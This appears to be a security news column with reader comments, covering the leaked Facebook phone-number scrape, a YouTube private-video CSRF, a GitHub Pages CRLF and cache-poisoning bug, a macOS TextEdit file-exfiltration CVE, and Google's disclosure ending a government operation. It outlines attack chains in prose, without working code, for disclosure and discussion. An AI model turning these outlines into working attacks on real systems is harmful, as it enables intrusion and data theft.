Facebook had a problem, way back in the simpler times that was 2019. Something like 533 million accounts had the cell phone number associated with the account leaked. It’s making security news this week, because that database has now been released for free in its entirety. The dataset consists of Facebook ID, cell number, name, location, birthday, bio, and email address. Facebook has pointed out that the data was not a hack or breach, but was simply scraped prior to a vulnerability being fixed in 2019.
The vulnerability was in Facebook’s contact import service, also known as the “Find Friends” feature. The short explanation is that anyone could punch a random phone number in, and get a bit of information about the FB account that claimed that number. The problem was that some interfaces to that service didn’t have appropriate rate limiting features. Combine that with Facebook’s constant urging that everyone link a cell number to their account, and the default privacy setting that lets anyone locate you by your cell number, and the data scraping was all but inevitable. The actual technique used may have been to spoof that requests were coming from the official Facebook app.
[Troy Hunt]’s Have i been pwned service has integrated this breach, and now allows searching by phone number, so go check to see if you’re one of the exposed. If you are, keep the leaked data in mind every time an email or phone call comes from someone you don’t know.
Impersonating a TV
[David Schütz] was at a friend’s house, and pulled out his phone to show off a private YouTube video. Google has worked hard to make the Android/Chromecast/Android TV interconnect seamless, and that system was firing on all cylinders. With a simple button press, that private video played on his friend’s smart TV, and it seemed very wrong that this was so easy.
For background, YouTube videos can exist in three states. A normal video shows up for everyone, and there are no restrictions on watching it. An unlisted video doesn’t show up in search results or on the channel’s page. You have to have the link to see it. The third option is a private video. These aren’t visible to anyone, even if they have the direct link. To share a private video, the viewers have to be on the list of allowed viewers. Not on the list? No video for you. So how did a smart TV, that wasn’t signed in to an authorized account, manage to play the private video? The magic is a token that is generated when a user initiates the process. This “ctt” token serves as a single purpose authenticator, allowing the TV to play the user’s private video.
This is a reasonable system, so long as everything was implemented securely. Spoilers: It wasn’t. The problem was a Cross-Site Request Forgery vulnerability. The magic token is intended to only be generated when a user is requesting it from YouTube. Because that intention wasn’t enforced, any site can request a token, so long as the video ID is known. Not only does the “cast to TV” process work with individual videos, it works with playlists, and it turns out that every YouTube account has a semi-hidden playlist consisting of every upload.
The attack flow goes like this: The victim visits the malicious website, and that site sends off a request for the user’s “uploads” playlist. Since the victim is logged in to YouTube, and the request is coming from their browser, the request is honored. Once the video IDs are known, a ctt token can be generated for each. And with that, the attacker has access to every video on the victim’s account, even the private ones. The fix was to implement proper CSRF protection, and restrict access to the API to the official client. PoC Demo below:
CRLF to Access Private Pages
GitHub offers more than just code hosting. They also host GitHub pages, and one of the features offered there is private pages. You can put together a web interface that uses GitHub accounts as authorization. Set up your organization with different roles, and you can restrict the page to users with the appropriate role. GitHub is very interested in keeping those pages secure, so private pages is one of the areas they offer bug bounties for exploits.
[Robert Chen] had a very boring junior year of high school, thanks to COVID, and took up vulnerability hunting as a hobby. He started looking at GitHub, and discovered a quirk. The authentication process sends a page_id
value, and that value is embedded in the response. He discovered that he could use url encoding to embed whitespace in the value. The authentication process would succeed, but the resulting page included the whitespace. This usually means that the value is processed by a toInt()
function, but the raw, user-generated value is getting passed on. It’s better practice to convert the integer back to a string, and use that as a known-trustworthy value.
The attack is to embed a script tag in that ID, in such a way that the authentication logic still succeeds, but you have code that runs on the victim’s page. This accomplished by a series of Carriage Returns and Line Feeds (CRLF), followed by an encoded null value. The toInt()
function stops processing as soon as it sees the null, but the payload is still passed on. The next step was taking advantage of inconsistent case sensitiveness. One part of the process sees “__HOST” and “__Host” as identical.
The last piece of the puzzle is cache poisoning. GitHub makes use of caching in the authentication flow, and without the above issues, it would be reasonably secure. The cache lookup is based on the results of toInt()
, so if an attacker’s malicious request is the one that populated the cache, every visitor could potentially run the embedded script. His research netted him a nice $35,000, and Github has cleaned up the problems within a month.
When a txt File Is HTML
How does an OS determine what to do with a given file? The primary two approaches are the filename extension, and the contents of the file. And some times, the exact response is determined by the combination of both. It’s potentially complicated, and such complications can give rise to security issues. Case in point, CVE-2019-8761. As you might notice from the year embedded in the CVE, [Paulos Yibelo] didn’t get into a huge hurry to publish his work. That aside, this CVE is all about how MacOS handles .txt
files that contain HTML code.
TextEdit is the default program used to open a text document, but it has support for bold text, different text colors, etc. In short, there’s more going on than raw text editing. The question then becomes, how much will TextEdit let you get away with? Quite a bit. If that text file starts out with , TextEdit parses the HTML rather than letting the user edit it. It’s not quite broken enough to run JavaScript, but there are still some shenanigans to be had. Inside a pair of CSS tags, it’s possible to import an external style script. While that imported script is external to the
.txt
file, it is still limited to the local filesystem. This would be the end of the story, and the most we could do is something mischievous like including /dev/urandom
, crashing the machine.
MacOS has an interesting feature, called AutoFS, which allows auto-mounting remote locations onto the local filesystem. This feature doesn’t require any special privileges, so it’s easy enough to include a file from a remote server that you control. That’s enough to do something interesting. [Paulos] drops a casual bombshell: He also happened to find a way for a website to automatically download a .txt
file and open it without any user interaction. So armed with this knowledge, an attacker could host a simple text file on a TOR server, and collect the real IP addresses of each visitor.
If that wasn’t enough, a bit of trickery with an unclosed style tag allows our rogue text file to reference the contents of a local file as part of the request. The result is that any file the TextEdit process can read, it can also upload to the attacker. The final MacOS quirk to make this even more interesting? Mac’s Gatekeeper, the part of the OS that tries to prevent running potentially malicious code, totally ignores txt
files. [Paulos] privately reported his finding to Apple in 2019, and he believes it was fixed in 2019 or early 2020.
Google’s Hard Decision Ends an Op
A couple weeks ago, news broke about who was behind a series of attacks covered by Google’s Project Zero. The attacks in question were a counter-terrorism operation run by a western government. Google discovered the attack, reverse-engineered the vulnerabilities, and made it public without providing any details about who was behind it. It’s become controversial, because this action likely killed the op before it got results. It raises an interesting question: What are the responsibilities of a researcher when he finds a vulnerability being used by a friendly government? When the researcher believes in the mission of the operation in question, even?
Google seems to have taken a justice-is-blind sort of approach. If they find the attack happening, they respond the same way, regardless of who is behind it. I suspect that this is based partly on the assumption that if Google has detected and reverse-engineered the attack, so have the usual suspects. If they sit on the findings, the op can happen, but APT groups from less friendly countries could reverse engineer and use the exploits as well. What do you think Hackaday, should Project Zero sit on vulnerabilities if a friendly government is behind the exploits? [Editor’s bonus question: Should “friendly” governments, tasked with protecting the security of their own citizen’s Internet, sit on vulnerabilities? If “yes”, with what oversight?] Let us know what you think about that and the rest of the stories below!
The answer to the Project Zero issue is simple: notify the “friendly” government in question when the exploit is discovered that you will be releasing the details on the vulnerability. While Project Zero finishes the write up and fully understanding the vulnerability the government can switch to using a different vulnerability. No government is owed an exploit, they merely use them while they still exist.
As for the bonus question: sitting on vulnerabilities for globally used software is like making a suicide pact because all nations are vulnerable. It seems like it would be a far better idea to find vulnerabilities in regionally used software.
A likely out come would be that “friendly” government getting a gag order (court order, NSL, etc.) to prevent the release of the information related to their activity.
Also on the “No government is owed an exploit”, what if that government paid $10M for the vulnerability to be exist:
https://www.theverge.com/2013/12/20/5231006/nsa-paid-10-million-for-a-back-door-into-rsa-encryption-according-to
Sitting on vulns does hurt everybody, other than criminals and a few small government agencies that sometimes behave like criminals. Ultimately, releasing the details on the vulnerability helped protect that “friendly” government (and all other governments), even though it may hamper the (sometimes questionable) activities of a small branch of that government.
Not an easy question in a world founded on antagonistic relationships and “friends” as a relative concept.
“My enemy’s enemy is my friend.”
My enemy’s enemy is my enemy’s enemy, nothing more.
Also: pillage _then_ burn.
a somewhat naive response which ignores the nuances of reality; the world is not black and white.
Fix the vulnerability immediately, notify nobody. If some government found it, they should be able to find a new one. they are no better than a malicious attacker no matter their justification.
TXT file vulnerability: This is why plain text email is the only reasonable email. Using HTML embedded, etc, is a major hole. I wish that the client I am required to use for work allowed plain text (The software from the north-west USA nominally does, but in my case it neither allows it for sending, nor allows for disabling interpretation on received mail, by “institutional policy”)
+1
I will regularly receive emails tens to hundreds of kilobytes in size with no renderable text outside HTML. Not even the courtesy message that the content is in HTML. These emails do not come from vague senders, but from the largest rail service provider here, for one. Except of course when they really need something from me. Then they will send a plain text email. They are very aware of what they are doing.
If the op was a justifiable op, then a warrant may suffice to continue. If the op wasn’t gathering information available to a warrant process, then the government was exploiting Google’s trust to take non-google actions. The fix for that is to publicly announce the feds have been shut out. Wink wink…
If the government really wanted to exploit that trust they could use their root cert to mitm google for that particular audience.
I’m a little doubtful that the government was shut out of an ongoing op against its will.
You missed the LinkedIn leak https://cybernews.com/news/stolen-data-of-500-million-linkedin-users-being-sold-online-2-million-leaked-as-proof-2/
IIRC, I didn’t give Fakebuck my cell number because I didn’t trust them.
LinkedIn on the other hand…
Your enemy’s enemy did.
B^)
I cringed extremely at people still being under the impression that Rick Rolling someone in 2021 is stilly funny.
Get you hat gramps! Impressive hack though.
Wow, MacOS is worse than I thought… The first rule of secure programming is “Don’t trust anything the user gives you”, and that included file extensions.
I mean, every time I hear about vulnerabilities in BSD, its always “If the attacker can someone get this exact sequence of unrelated inputs to arrive at the machine, and correctly guess a series of addresses, the moon is in the right position, and a flock 7 starlings pass by the window going west at 3 kph, it may be possible to deduce the first bit of a private key, if the attacker has access to the buffer of the 7th serial port on the system”.
But when I hear about Mac software bugs its things like “you can log in as root if you mash the ‘Okay’ button enough times”…
English or African starlings?
Laden or unladen?
I…I don’t know…
*Fwoosh*
friendlytrustworthy governmentIs there one
easy answer, there are no friendly governments and they should publish!
“I’m a little doubtful that the government was shut out of an ongoing op against its will.”
I don’t think you understand what actually happened.
1. Exploits were found and used by a government, and they allow for an operation.
2. Google finds the same vulnerabilities, and tracks their use.
3. Google patches it’s services to remove the vulnerabilities, and properly discloses them so that others can also patch.
4. The vulnerabilities are gone, so the government can’t keep using them. The OP is done.
I think there is also a bit of confusion about what an “Operation” actually is.
An OP is not the intent do do something. It is the ACTUAL doing of the thing.
It’s just like the “surgery” use of the word.
If a company doesn’t ship out a knee replacement, then the Operation to install that part is stopped.
It doesn’t mean that the person doesn’t still need/want a knee replacement.
Nor does it mean that they won’t re-order the part and re-schedule the operation.
The government that had their OP stopped isn’t going to drop everything.
But they WILL need to develop and run a NEW OP.